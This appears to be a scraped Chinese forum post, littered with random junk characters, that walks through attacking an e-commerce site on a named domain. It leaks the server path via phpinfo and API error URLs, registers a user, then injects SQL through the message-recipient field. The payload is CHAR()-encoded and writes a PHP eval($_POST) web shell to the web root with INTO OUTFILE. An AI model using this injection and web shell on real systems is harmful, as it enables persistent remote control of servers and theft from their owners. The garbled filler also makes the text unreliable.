第一个:想办法找到目标网站的绝对路径) E- i7 T6 N ^) a6 z* X9 r
4 e0 {- X& h$ r# U* n; M& n/ S9 N
http://www.political-security.com/install/svinfo.php?phpinfo=true
7 k$ Z5 L6 o& r! j3 X0 i9 F6 }
5 [4 B( u3 Z$ i" Q$ G5 ]2 X+ Qhttp:/www.political-security.com/core/api/shop_api.php) L6 a/ @ w+ B, ]+ a
6 z1 w8 j& N6 Shttp://www.political-security.co ... api_b2b_2_0_cat.php
4 @/ r0 Z3 A- u+ `! k+ w+ L! t( z
% J, R1 ]' m% Ihttp://www.political-security.com/core/ap ... b_2_0_goodstype.php, t4 G, |6 `% z+ y7 X6 C
3 P- Q* D* D7 Y" v1 Zhttp://www.political-security.co ... i_b2b_2_0_brand.php
! D5 ]7 @, n8 _ H9 Q3 `. }( n第二个:注册一个普通用户
; ]0 f1 G+ Y2 V# A6 R$ a9 {) X! C; G- R5 J, h# o0 d
http://www.political-security.com/?passport-signup.html s& b) T6 {, y5 j
; W/ n1 X/ S6 g% G: n1 n第三个: 发送消息
N! i7 P6 v3 b, |" N
u/ z! o4 n; k4 z8 y' x3 Shttp://www.political-security.com/?member-send.html- S* x1 h9 j# l$ m; r9 R9 i
发送给中填写4 c5 R6 @" L. o3 y
antian365.com' union select CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php' # |